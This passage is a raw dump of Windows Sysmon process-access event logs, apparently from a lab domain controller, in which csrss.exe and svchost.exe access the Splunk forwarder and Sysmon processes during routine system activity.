C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-0010FFEE0300}","TargetProcessId":"3940","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2102,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2103,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2104,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2105,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2106,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2107,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2108,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.109","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2109,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.109\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 